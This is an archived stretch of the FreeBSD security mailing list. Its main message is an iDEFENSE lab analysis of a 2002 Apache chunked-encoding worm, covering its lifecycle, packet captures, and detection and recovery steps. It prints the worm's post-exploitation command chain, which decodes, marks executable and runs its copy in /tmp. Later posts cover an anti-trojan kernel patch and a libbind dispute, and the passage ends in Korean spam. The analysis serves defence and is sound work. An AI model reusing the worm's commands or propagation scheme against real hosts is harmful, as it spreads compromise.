freebsd-security@freebsd.org Subject: Apache Worm Analysis (was Re: Apache worm in the wild) Based on the Bugtraq posted code from Domas Mituzas (http://dammit.lt/apache-worm/apache-worm.c), iDEFENSE Labs performed an initial analysis in a closed lab environment. The lab environment consisted of the following machines and applications: Host: wormbait Running fresh FreeBSD 4.5 x86 standard installation with Apache 1.3.20 default installation, lsof 4.64, and Tripwire 2.3.1-2 IP address 172.16.159.100 % uname -a FreeBSD attacker 4.5-RELEASE FreeBSD 4.5-RELEASE #0: Mon Jan 28 14:31:56 GMT 2002 Host: attacker Running fresh FreeBSD 4.5 x86 standard installation, lsof 4.64, and Tripwire 2.3.1-2 IP address 172.16.159.57 % uname -a FreeBSD attacker 4.5-RELEASE FreeBSD 4.5-RELEASE #0: Mon Jan 28 14:31:56 GMT 2002 Host: sniffer Redhat Linux 7.1 fully patched Passive network interface (no assigned IP address) in promiscuous mode with Ethereal and TCPdump PREPARATION The worm was compiled on the attacker host into a binary named .a: % gcc apache_code.c -o .a % mv .a /tmp % ls -l /tmp total 52 -rwxr-xr-x 1 nobody wheel 51598 Jun 29 17:49 .a The worm's author hardcoded several features into the code, which make for shortcomings in the propagation routine. The worm binary MUST be named ".a" and be placed in the /tmp directory or else it cannot infect other hosts. If the binary is removed at any time from the /tmp directory while the worm is running in the background, it will only be able to upload blank benign copies of itself to future exploited hosts. Any FreeBSD installations that have the /tmp directory as a separate partition and have set the noexec flag will prevent the worm from scanning other hosts assuming the system has been infected. The following sections have been organized into the lifecycle of this worm: Listen for UDP packets -> Scan for new hosts -> Exploit found hosts -> Transfer payload to victim -> Launch new host -> Listen for UDP packets - > ... LISTEN The worm requires at least one argument to be run from the command line, although in most cases it will be automatically launched in future infection scenarios: % ./a /tmp/.a [base 2] ... The "base" argument is an IP address or hostname of the system that originally infected the attacker. The attacking computer (that has just been infected) sends a UDP packet to this base host and requires a response in the form of two UDP packets in order to launch. It is unclear why the author designed the worm to wait for these response packets before running. The following is the TCPdump packet that the attacker would send to the host that originally infected it. For the purposes of the analysis, we used the attacker is used as its own base host to start the scenario. Extrapolating from the log data, the initial packet looks like the following: 15:51:29.967989 attacker.2001 > base_host.2001: [udp sum ok] udp 16 (ttl 64, id 5868, len 44) 4500 002c 16ec 0000 4011 cd16 ac10 9f64 ac10 9f39 07d1 07d1 0018 e95c 7000 0000 0000 0000 0000 0000 0000 0000 The base host must then send back a response back to the newly infected attacker consisting of two UDP packets or else the worm will not begin scanning for new hosts. However, even if the responses are not received from the base host, the worm continues to listen on UDP port 2001. From source code analysis, it seems the UDP server is rather benign and does not provide backdoor Trojan capabilities, although it is extremely feasible that future variants may integrate that feature. Running netstat will show the listening port on an infected FreeBSD host as the "wizard" service, which is assigned to port 2001 in most /etc/services files: Active Internet connections (including servers) Proto Recv-Q Send-Q Local Address Foreign Address (state) tcp4 0 0 *.smtp *.* LISTEN tcp4 0 0 *.ssh *.* LISTEN tcp46 0 0 *.ssh *.* LISTEN tcp4 0 0 *.ftp *.* LISTEN udp4 0 0 *.syslog *.* udp4 0 0 *.wizard *.* udp6 0 0 *.syslog *.* Active UNIX domain sockets Address Type Recv-Q Send-Q Inode Conn Refs Nextref Addr c8ec7ec0 dgram 0 0 0 c8e97fc0 0 c8ec7e80 c8ec7e80 dgram 0 0 0 c8e97fc0 0 c8ec7f80 c8ec7f80 dgram 0 0 0 c8e97fc0 0 c8ec7fc0 c8ec7fc0 dgram 0 0 0 c8e97fc0 0 0 c8e97fc0 dgram 0 0 c8e92cc0 0 c8ec7ec0 0 Running lsof shows the following files and sockets being accessed by the worm (the last ten lines): % lsof adjkerntz 17 root txt VREG 116,131072 62264 42241 /sbin/adjkerntz syslogd 55 root 3u unix 0xc8520ec0 0t0 /var/run/log syslogd 55 root 9w VREG 116,131072 30522 253467 /var/log/messages syslogd 55 root 10w VREG 116,131072 0 253468 /var/log/security syslogd 55 root 11w VREG 116,131072 1573 253465 /var/log/maillog syslogd 55 root 12w VREG 116,131072 0 253464 /var/log/lpd-errs syslogd 55 root 13w VREG 116,131072 6233 253462 /var/log/cron syslogd 55 root 14w VREG 116,131072 0 253469 /var/log/slip.log syslogd 55 root 15w VREG 116,131072 0 253470 /var/log/ppp.log inetd 62 root txt VREG 116,131072 27088 212720 /usr/lib/libwrap.so.3 cron 64 root cwd VDIR 116,131072 512 253453 /var/cron cron 64 root 3uW VREG 116,131072 3 265182 /var/run/cron.pid sshd 66 root txt VREG 116,131072 121320 216910 /usr/lib/libasn1.so.3 sshd 66 root txt VREG 116,131072 27088 212720 /usr/lib/libwrap.so.3 sshd 66 root txt VREG 116,131072 34664 212691 /usr/lib/libpam.so.1 sendmail 70 root cwd VDIR 116,131072 512 253482 /var/spool/mqueue sendmail 70 root rtd VDIR 116,131072 512 2 / sendmail 70 root txt VREG 116,131072 403136 214274 /usr/libexec/sendmail/sendmail sendmail 70 root txt VREG 116,131072 76560 214314 /usr/libexec/ld-elf.so.1 sendmail 70 root txt VREG 116,131072 32912 212616 /usr/lib/libutil.so.3 sendmail 70 root txt VREG 116,131072 27088 212720 /usr/lib/libwrap.so.3 sendmail 70 root txt VREG 116,131072 177160 216844 /usr/lib/libssl.so.2 sendmail 70 root txt VREG 116,131072 762068 216836 /usr/lib/libcrypto.so.2 sendmail 70 root txt VREG 116,131072 573760 212628 /usr/lib/libc.so.4 sendmail 70 root 0r VCHR 2,2 0t0 232339 /dev/null sendmail 70 root 1w VCHR 2,2 0t0 232339 /dev/null sendmail 70 root 2w VCHR 2,2 0t0 232339 /dev/null sendmail 70 root 3u unix 0xc8520b00 0t0 - >0xc8520ec0 sendmail 70 root 4u IPv4 0xc85dcc60 0t0 TCP *:smtp (LISTEN) sendmail 70 root 5u IPv4 0xc85dca40 0t0 TCP *:submission (LISTEN) login 90 root txt VREG 116,131072 34664 212691 /usr/lib/libpam.so.1 login 90 root txt VREG 116,131072 4024 212687 /usr/lib/pam_skey.so login 90 root txt VREG 116,131072 3208 212683 /usr/lib/pam_cleartext_pass_ok.so login 90 root txt VREG 116,131072 4828 212689 /usr/lib/pam_unix.so login 90 root txt VREG 116,131072 3436 212685 /usr/lib/pam_permit.so login 91 root txt VREG 116,131072 34664 212691 /usr/lib/libpam.so.1 login 91 root txt VREG 116,131072 4024 212687 /usr/lib/pam_skey.so login 91 root txt VREG 116,131072 3208 212683 /usr/lib/pam_cleartext_pass_ok.so login 91 root txt VREG 116,131072 4828 212689 /usr/lib/pam_unix.so login 91 root txt VREG 116,131072 3436 212685 /usr/lib/pam_permit.so login 92 root txt VREG 116,131072 34664 212691 /usr/lib/libpam.so.1 login 92 root txt VREG 116,131072 4024 212687 /usr/lib/pam_skey.so login 92 root txt VREG 116,131072 3208 212683 /usr/lib/pam_cleartext_pass_ok.so login 92 root txt VREG 116,131072 4828 212689 /usr/lib/pam_unix.so login 92 root txt VREG 116,131072 3436 212685 /usr/lib/pam_permit.so csh 98 root cwd VDIR 116,131072 512 244353 /usr/local/apache/logs csh 100 root 3u PIPE 0xc8e81d40 16384 - >0xc8e81a20 csh 100 root 4u PIPE 0xc8e81a20 16384 - >0xc8e81d40 httpd 106 root txt VREG 116,131072 471064 244356 /usr/local/apache/bin/httpd httpd 106 root 2w VREG 116,131072 2698 244751 /usr/local/apache/logs/error_log httpd 106 root 15w VREG 116,131072 2698 244751 /usr/local/apache/logs/error_log httpd 106 root 17w VREG 116,131072 1217 244752 /usr/local/apache/logs/access_log httpd 565 nobody txt VREG 116,131072 471064 244356 /usr/local/apache/bin/httpd httpd 565 nobody 2w VREG 116,131072 2698 244751 /usr/local/apache/logs/error_log httpd 565 nobody 15w VREG 116,131072 2698 244751 /usr/local/apache/logs/error_log httpd 565 nobody 17w VREG 116,131072 1217 244752 /usr/local/apache/logs/access_log httpd 585 nobody txt VREG 116,131072 471064 244356 /usr/local/apache/bin/httpd httpd 585 nobody 2w VREG 116,131072 2698 244751 /usr/local/apache/logs/error_log httpd 585 nobody 15w VREG 116,131072 2698 244751 /usr/local/apache/logs/error_log httpd 585 nobody 17w VREG 116,131072 1217 244752 /usr/local/apache/logs/access_log httpd 741 nobody txt VREG 116,131072 471064 244356 /usr/local/apache/bin/httpd httpd 741 nobody 2w VREG 116,131072 2698 244751 /usr/local/apache/logs/error_log httpd 741 nobody 15w VREG 116,131072 2698 244751 /usr/local/apache/logs/error_log httpd 741 nobody 17w VREG 116,131072 1217 244752 /usr/local/apache/logs/access_log httpd 768 nobody txt VREG 116,131072 471064 244356 /usr/local/apache/bin/httpd httpd 768 nobody 2w VREG 116,131072 2698 244751 /usr/local/apache/logs/error_log httpd 768 nobody 15w VREG 116,131072 2698 244751 /usr/local/apache/logs/error_log httpd 768 nobody 17w VREG 116,131072 1217 244752 /usr/local/apache/logs/access_log httpd 905 nobody txt VREG 116,131072 471064 244356 /usr/local/apache/bin/httpd httpd 905 nobody 2w VREG 116,131072 2698 244751 /usr/local/apache/logs/error_log httpd 905 nobody 15w VREG 116,131072 2698 244751 /usr/local/apache/logs/error_log httpd 905 nobody 17w VREG 116,131072 1217 244752 /usr/local/apache/logs/access_log httpd 1011 nobody txt VREG 116,131072 471064 244356 /usr/local/apache/bin/httpd httpd 1011 nobody 2w VREG 116,131072 2698 244751 /usr/local/apache/logs/error_log httpd 1011 nobody 15w VREG 116,131072 2698 244751 /usr/local/apache/logs/error_log httpd 1011 nobody 17w VREG 116,131072 1217 244752 /usr/local/apache/logs/access_log .a 1103 root cwd VDIR 116,131072 512 274560 /tmp .a 1103 root rtd VDIR 116,131072 512 2 / .a 1103 root txt VREG 116,131072 51598 286300 /tmp/.a .a 1103 root txt VREG 116,131072 76560 214314 /usr/libexec/ld-elf.so.1 .a 1103 root txt VREG 116,131072 573760 212628 /usr/lib/libc.so.4 .a 1103 root 0u VCHR 2,2 0t0 232339 /dev/null .a 1103 root 1u VCHR 2,2 0t0 232339 /dev/null .a 1103 root 2u VCHR 2,2 0t0 232339 /dev/null .a 1103 root 3u VCHR 2,2 0t0 232339 /dev/null .a 1103 root 4u IPv4 0xc857ebc0 0t0 UDP *:wizard At any time, the owner of an infected computer can determine the original base host that infected it simply by looking at the process list: % ps aux | grep ".a" nobody 1103 0.0 0.4 932 444 v1 S 6:46PM 0:00.00 /tmp/.a 172.16.159.57 The required response packets by the waiting attacker from the base host look something like this in a TCPdump capture: 15:51:29.970308 base_host.2001 > attacker.2001: [udp sum ok] udp 20 (ttl 64, id 7130, len 48) 4500 0030 1bda 0000 4011 c824 ac10 9f39 ac10 9f64 07d1 07d1 001c 9adf 7300 0000 0000 0000 0000 0000 0000 0000 ac10 9f64 15:51:29.970626 base_host.2001 > attacker.2001: [udp sum ok] udp 24 (ttl 64, id 7131, len 52) 4500 0034 1bdb 0000 4011 c81f ac10 9f39 ac10 9f64 07d1 07d1 0020 498d 7100 0000 0000 0000 0800 0000 0000 0000 ac10 9f64 ac10 9f39 SCAN Once the attacker's worm receives these packets on the UDP server listening on port 2001, the worm begins to scan random class B IP address ranges for Apache web servers. iDEFENSE Labs modified the code slightly so it would instantly start scanning on the same class B (172.16.159.x) that the wormbait host was on. In order to find an active Apache web server, it sends the following web request: GET / HTTP/1.1 This request will show up as in the victim's Apache access logs as the following: 172.16.159.57 - - [29/Jun/2002:15:06:41 -0400] "GET / HTTP/1.1" 400 378 More importantly, the request will also show up the Apache error logs since a proper "Host:" header is not included, as seen here: [Sat Jun 29 15:06:41 2002] [error] [client 172.16.159.57] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): / EXPLOIT When the worm receives the results of the HTTP response, it determines if the web server is running Apache by using a simple string compare function on the word "Apache". Regardless of version, the worm will try the two memory offsets to use in the chunked-encoding exploit for the respective targets of Apache 1.3.20 or 1.3.22-24. The exploit seems to use the exact same shellcode as the apache_nosejob.c posted by GOBBLES. iDEFENSE Labs also tested the worm on Apache 1.3.24 with the same successful exploitation results. The attacker then sends the chunked- encoding exploit over HTTP to the vulnerable Apache server, which looks something like this when reconstructed from the sniffer data: http://www.idefense.com/idtools/Apache%20Worm.txt TRANSFER Upon successful exploitation, the worm is able to upload a uuencoded copy of itself named ".uua" to the victim's /tmp directory. UUencode is a popular software utility used to translate mostly binary file types into a 7-bit ASCII set of characters so that they can be attached to an e-mail message or posted to a newsgroup. The worm (while still issuing commands through the buffer overflow exploit to the victim) issues a uudecode command through the established HTTP socket to extract the file into the .a binary. A user on an infected host would see the following two files in the /tmp directory: % ls -la /tmp total 122 -rwxr-xr-x 1 nobody wheel 51598 Jun 29 17:49 .a -rw-r--r-- 1 nobody wheel 71113 Jun 29 17:49 .uua The attacker then executes the .a binary on the victim's host causing the cycle to be completed. The actual command stream that causes the last few events to occur is sent into the HTTP stream by the attack into the shell that results from successful exploitation of the chunked- encoding vulnerability: /usr/bin/uudecode -p /tmp/.uua > /tmp/.a;killall -9 .a;chmod +x /tmp/.a;killall -9 .a;/tmp/.a 172.16.159.57 The above sequence of commands stops all previous infected versions of the worm from running, since it's possible for multiple reinfections to occur from different originating hosts. ANALYSIS: This worm is just another component of the general vulnerability disclosure trend. When a vulnerability is first discovered, the vendor of the vulnerable software or hardware is often notified first. However, the time between disclosure and a proof-of- concept exploit is narrowing, as if the time between the disclosure of the exploit and the creation of the worm. And the trend will continue during the year(s) to come. This particular vulnerability in Apache's chunked encoding was publicly disclosed on June 17, 2002; an exploit was disclosed on June 19; this worm was discovered in the wild on June 28. Even though the range of exploitable applications and platforms was quite limited this time (FreeBSD only), it is extremely likely now that others will emerge given the source code is now publicly available. This worm was programmed in C in a rather sloppy fashion in what almost seems to have been a preexisting worm skeleton. Many of the functions and routines in the code are never called or used at all. It is almost as if these sections (such as the e-mail component and logging feature) were never fully configured properly. In fact, this seems more like a proof-of-concept worm since it causes no damage, barring any indirect denial of service or system resource over consumption. While this worm is somewhat benign in its payload, administrators should take caution as there are many others who can easily construct more destructive worms and release them in the wild with minimal technical expertise. DETECTION: Only FreeBSD 4.5 installations are affected currently. Look for the existence of the .a and .uua files in the /tmp directory, a UDP server running on port 2001, or many outbound web connections that are shown when running netstat. RECOVERY: Simply delete the files .a and .uua in the /tmp directory, and kill the worm process: % ps aux | grep ".a" nobody 1103 0.0 0.4 932 444 v1 S 6:46PM 0:00.00 /tmp/.a 172.16.159.57 % kill -9 1103 VENDOR FIX: Administrators should download and install HTTP Server 1.3.26, which corrects the chunked-encoding problem. It is available at http://www.apache.org/dist/httpd/apache_1.3.26.tar.gz. Michael Sutton Senior Security Engineer, iDEFENSE Labs msutton@idefense.com David Endler Director, iDEFENSE Labs dendler@idefense.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 30 18: 0:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5664F37B400 for ; Sun, 30 Jun 2002 18:00:13 -0700 (PDT) Received: from mta2-rme.xtra.co.nz (mta2-rme.xtra.co.nz [210.86.15.130]) by mx1.FreeBSD.org (Postfix) with ESMTP id 243A043E09 for ; Sun, 30 Jun 2002 18:00:07 -0700 (PDT) (envelope-from mike@netxsecure.net) Received: from netxsecure.net ([210.55.243.47]) by mta2-rme.xtra.co.nz with ESMTP id <20020701010005.RLWM14139.mta2-rme.xtra.co.nz@netxsecure.net> for ; Mon, 1 Jul 2002 13:00:05 +1200 Message-ID: <3D1FAB41.396C0D23@netxsecure.net> Date: Mon, 01 Jul 2002 13:07:13 +1200 From: "Michael A. Williams" Reply-To: mike@netxsecure.net X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.4-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd security Subject: New V2 Anti-Trojan kernel patches -Improved and extended for FreeBSD 4.6 Release Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, Our latest version of Anti-Trojan software, V2 is now available as a beta for FreeBSD 4.6 Release. V2 adds several new important Trojan Detection features with a big reduction in the overall impact on a running kernel. 1.Cryptographic hash checking and filtering all files loaded through the memory map call mmap which covers: -Shared libraries -Loadable kernel modules 2.Activation very early in the boot cycle to provide warnings against Trojan files waiting to execute at boot time before the secure level is raised. 3.Improved efficiency in terms of system rescues used, providing very affordable increased security capabilities. 4.Cryptographic hash checking and filtering the Execve call including script files and an associated interpreter as the original reference version did yet utilizing the more efficient techniques from the V2 code. The link is: http://www.trojanproof.org/sigexec-fbsd4.6rV2-beta1.tgz Regards, Mike. -- Michael A. Williams Security Software Engineering and InfoSec Manager NetXSecure NZ Limited, http://www.nxs.co.nz Ph: +64.3.318.2973 Fax: +64.3.318.2975 Mob: +64.21.995.914 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 30 18:14: 2 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5F97837B400 for ; Sun, 30 Jun 2002 18:13:58 -0700 (PDT) Received: from m-net.arbornet.org (m-net.arbornet.org [209.142.209.161]) by mx1.FreeBSD.org (Postfix) with ESMTP id D23A343E0A for ; Sun, 30 Jun 2002 18:13:57 -0700 (PDT) (envelope-from polytarp@m-net.arbornet.org) Received: from m-net.arbornet.org (localhost [127.0.0.1]) by m-net.arbornet.org (8.12.3/8.11.2) with ESMTP id g611EC1H009002; Sun, 30 Jun 2002 21:14:12 -0400 (EDT) (envelope-from polytarp@m-net.arbornet.org) Received: from localhost (polytarp@localhost) by m-net.arbornet.org (8.12.3/8.12.3/Submit) with ESMTP id g611EBdJ008999; Sun, 30 Jun 2002 21:14:11 -0400 (EDT) Date: Sun, 30 Jun 2002 21:14:11 -0400 (EDT) From: pgreen To: "Michael A. Williams" Cc: freebsd security Subject: Re: New V2 Anti-Trojan kernel patches -Improved and extended for FreeBSD 4.6 Release In-Reply-To: <3D1FAB41.396C0D23@netxsecure.net> Message-ID: <20020630211338.C8909-100000@m-net.arbornet.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org You know, residents of London may not like your name of it. On Mon, 1 Jul 2002, Michael A. Williams wrote: > Hi, > > Our latest version of Anti-Trojan software, V2 is now available as a > beta for FreeBSD 4.6 Release. > > V2 adds several new important Trojan Detection features with a big > reduction in the overall impact on a running kernel. > > 1.Cryptographic hash checking and filtering all files loaded through the > memory map call mmap which covers: > -Shared libraries > -Loadable kernel modules > > 2.Activation very early in the boot cycle to provide warnings against > Trojan files waiting to execute at boot time before the secure level is > raised. > > 3.Improved efficiency in terms of system rescues used, providing very > affordable increased security capabilities. > > 4.Cryptographic hash checking and filtering the Execve call including > script files and an associated interpreter as the original reference > version did yet utilizing the more efficient techniques from the V2 > code. > > The link is: > http://www.trojanproof.org/sigexec-fbsd4.6rV2-beta1.tgz > > Regards, Mike. > > > -- > Michael A. Williams > Security Software Engineering and InfoSec Manager > NetXSecure NZ Limited, http://www.nxs.co.nz > Ph: +64.3.318.2973 Fax: +64.3.318.2975 Mob: +64.21.995.914 > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 30 19: 0: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id DCE2037B400 for ; Sun, 30 Jun 2002 19:00:02 -0700 (PDT) Received: from mikehan.com (giles.mikehan.com [67.113.132.26]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3AE4143E0A for ; Sun, 30 Jun 2002 19:00:02 -0700 (PDT) (envelope-from mikehan@giles.mikehan.com) Received: from giles.mikehan.com (localhost [127.0.0.1]) by mikehan.com (8.12.3/8.12.3) with ESMTP id g61201h8062347; Sun, 30 Jun 2002 19:00:01 -0700 (PDT) (envelope-from mikehan@giles.mikehan.com) Received: (from mikehan@localhost) by giles.mikehan.com (8.12.3/8.12.3/Submit) id g612015Z062346; Sun, 30 Jun 2002 19:00:01 -0700 (PDT) Date: Sun, 30 Jun 2002 19:00:01 -0700 From: Michael Han To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: libc flaw: BIND 9 closes most holes but also opens one Message-ID: <20020630190001.L31022@giles.mikehan.com> References: <4.3.2.7.2.20020629153253.02e88ef0@localhost> <200206282259.QAA03790@lariat.org> <4.3.2.7.2.20020629123101.02ed2df0@localhost> <4.3.2.7.2.20020629153253.02e88ef0@localhost> <4.3.2.7.2.20020629154457.02fafb00@localhost> <3D1E2D22.EBCE8199@FreeBSD.org> <4.3.2.7.2.20020629180311.02b5b2d0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <4.3.2.7.2.20020629180311.02b5b2d0@localhost>; from brett@lariat.org on Sat, Jun 29, 2002 at 06:06:58PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sat, Jun 29, 2002 at 06:06:58PM -0600, Brett Glass wrote: > At 03:56 PM 6/29/2002, Doug Barton wrote: > > >You quoted the second page. The URL I left in the quotation above is the > >announcement for 8.2.6, which says: > > > >Highlights vs. 8.2.5 > > Security Fix libbind. All applications linked against libbind > > need to relinked. > > So? That's not the version of libbind that's in 9.2.1. The version > in 9.2.1 is vulnerable; I've checked the source. Brett, your postings suggest that you don't understand the nature of the bug and libbind. libbind is an optional component which the vast majority of FreeBSD users would not have installed on their systems. Bind itself does not link to it in the default installation, and under no circumstances is the Bind named server a vector for risk. Only by installing the vulnerable libbind and linking software against it (this would not be the default behavior of any normally ported/portable software) can an installation of Bind introduce risk. libbind is a *replacement* library (or it's possible that it could serve as the only implementation on a truly ancient and backwards system) providing name service resolution to applications that need that. Normally these services are gotten from the native C library, libc. It takes some serious doing to cause any software on your system to be at risk because of a Bind installation, hence several rather patient people trying to explain that you're greatly exaggerating the risk and causing needless confusion. -- mikehan+^$#&*@mikehan.com http://www.mikehan.com/ coffee achiever San Francisco, California "Notice how I blame my own mistakes on the lack of rules?" - Dan Espen To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 30 19: 8:52 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id F1BDE37B400 for ; Sun, 30 Jun 2002 19:08:49 -0700 (PDT) Received: from drugs.dv.isc.org (drugs.dv.isc.org [130.155.191.236]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0BF4743E13 for ; Sun, 30 Jun 2002 19:08:48 -0700 (PDT) (envelope-from marka@drugs.dv.isc.org) Received: from drugs.dv.isc.org (localhost.dv.isc.org [127.0.0.1]) by drugs.dv.isc.org (8.12.3/8.12.3) with ESMTP id g6128hm0066820; Mon, 1 Jul 2002 12:08:43 +1000 (EST) (envelope-from marka@drugs.dv.isc.org) Message-Id: <200207010208.g6128hm0066820@drugs.dv.isc.org> To: Brett Glass Cc: Pete Ehlke , security@FreeBSD.ORG From: Mark.Andrews@isc.org Subject: Re: libc flaw: BIND 9 closes most holes but also opens one In-reply-to: Your message of "Sat, 29 Jun 2002 22:10:05 CST." <4.3.2.7.2.20020629220046.02bed9a0@localhost> Date: Mon, 01 Jul 2002 12:08:43 +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > At 07:18 PM 6/29/2002, Pete Ehlke wrote: > > >You are aware, Brett, that you are lecturing one of the BIND authors on > >the subtleties of the BIND source? > > > >Once and for all: there is a fixed 8.3.x. There is a fixed 8.2.x. There > >is even a fixed v4. > > In short, you've gone back and created fixed versions of these > "ancient" bloodlines? > > If so, that's good, but it doesn't help the majority of us. You have been told how to fix the problem. Install libbind from BIND 8 (that implies the include files). BIND9: don't call configure with --enable-libbind (this is the default) BIND8: remove "bin" from "SUBDIRS= include port lib bin" in the top level Makefile Install both BIND 8 and BIND 9. "--enable-libbind" effectively does just that. Mark > In particular, it doesn't help people who install FreeBSD now, > or who maintain it and need to make sure that everything's fixed. > We need BIND 9 (required to shield other systems, including Solaris > and Windows boxes, which are likely vulnerable) and a fixed > libbind. Oh, and a fixed Sendmail, which right now can only > be had if one risks installing a -STABLE snapshot. (4.6-RELEASE-p1, > for some reasond, does not have it.) And you can't install > binary packages if they contain statically linked binaries. > > In short, right now, it's damnably difficult to secure existing > FreeBSD systems or to create new ones (for which I have clients > waiting). So, pardon me if I seem frustrated. I'm responsible > for plugging all the holes in the dikes and for building several > systems that I cannot, right now, build with confidence. > > --Brett > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Mark Andrews, Internet Software Consortium 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: Mark.Andrews@isc.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 30 19:31:33 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 47A8C37B405 for ; Sun, 30 Jun 2002 19:30:42 -0700 (PDT) Received: from relay1.kornet.net (relay1.kornet.net [211.48.62.161]) by mx1.FreeBSD.org (Postfix) with ESMTP id A666A43E0A for ; Sun, 30 Jun 2002 19:30:41 -0700 (PDT) (envelope-from amimi0404@kornet.net) Received: from ns (61.73.89.202) by relay1.kornet.net; 1 Jul 2002 11:30:37 +0900 Message-ID: <3d1fbed03e07e08c@relay1.kornet.net> (added by relay1.kornet.net) From: =?ks_c_5601-1987?B?v+y4rsSrteXIuL/4IL+1vvfGwMDl?= To: freebsd-security@freebsd.org Subject: =?ks_c_5601-1987?B?W7GksO1dIGZyZWVic2Qtc2VjdXJpdHm01CDA57nMwNa0wiC758C6x7DAuyC15biusNq9wLTPtNkh?= Date: Mon, 01 Jul 2002 11:35:48 +0900 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0117_01C0F35A.93A48C00" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0117_01C0F35A.93A48C00 Content-Type: text/plain; charset="ks_c_5601-1987" Content-Transfer-Encoding: base64 v+y4rsSrteUgICAgDQoNCiAgICAgDQogICAgCQkJCQkJILy6uO0gIAkJICDB1rnOte63zyC5 +MijICANCsH3wOUgwPzIrSAgICAgIMjetOvG+SAgCSAgICAgDQogICANCiAgICAgILHNx8/A xyAguN7Az8HWvNK0wiDApbytx87AuyDF68fYILz2wf3H0SCwzcDMuOcsILHXv9y/oSC+7raw x9EgwaS6uLW1ILCusO0gIMDWwfYgvsrAvcC7ILngyPy0z7TZLg0KICDAzCBFLW1haWzAuiC5 373FwPy/68DMuOcsIL/4xKEgvsrAuL3HICCw5r/sIL7Gt6Egw6K/oSC43sDPwda80rimIMDU t8LHz7+pIMHWvcO46SC1ziC5+CC02b3DILjewM8gIMDMICCwocH2IL7KtbW3zyDHz7DavcC0 z7TZLg0KICAgICAJICC89r3FsMW6ziAgLyByZWZ1c2FsIG9mIHJlY2VpcHQgICAJICAgIAkg IA0KIA0KDQogDQo= ------=_NextPart_000_0117_01C0F35A.93A48C00 Content-Type: text/html; charset="ks_c_5601-1987" Content-Transfer-Encoding: base64 PGh0bWw+DQoNCjxoZWFkPg0KPFNDUklQVCBsYW5ndWFnZT1qYXZhc2NyaXB0Pg0KPCEtLQ0K ZnVuY3Rpb24gY2xpY2tNb3VzZSgpDQoJew0KCSAgDQoJCWlmICgoZXZlbnQuYnV0dG9uPT0y KSB8fCAoZXZlbnQuYnV0dG9uPT0zKSl7DQoJCQlyZXR1cm4gKGZhbHNlKTsNCgkJfQkNCgl9 DQoJDQoJZnVuY3Rpb24gY2xpY2tLZXkoKQ0KCXsNCgkJaWYoKGV2ZW50LnNoaWZ0S2V5KSAm JiAoZXZlbnQua2V5Q29kZSA9PSAxMjEpKQ0KCQl7CQkNCgkJCXJldHVybiBmYWxzZTsNCgkJ fQkNCgl9DQoJDQoJZnVuY3Rpb24gbm9BY3Rpb24oKXsNCgkJcmV0dXJuIGZhbHNlOw0KCX0N Cg0KZG9jdW1lbnQub25tb3VzZWRvd249Y2xpY2tNb3VzZQ0KZG9jdW1lbnQub25rZXlkb3du PWNsaWNrS2V5DQpkb2N1bWVudC5vbmNvbnRleHRtZW51PW5vQWN0aW9uDQpkb2N1bWVudC5v 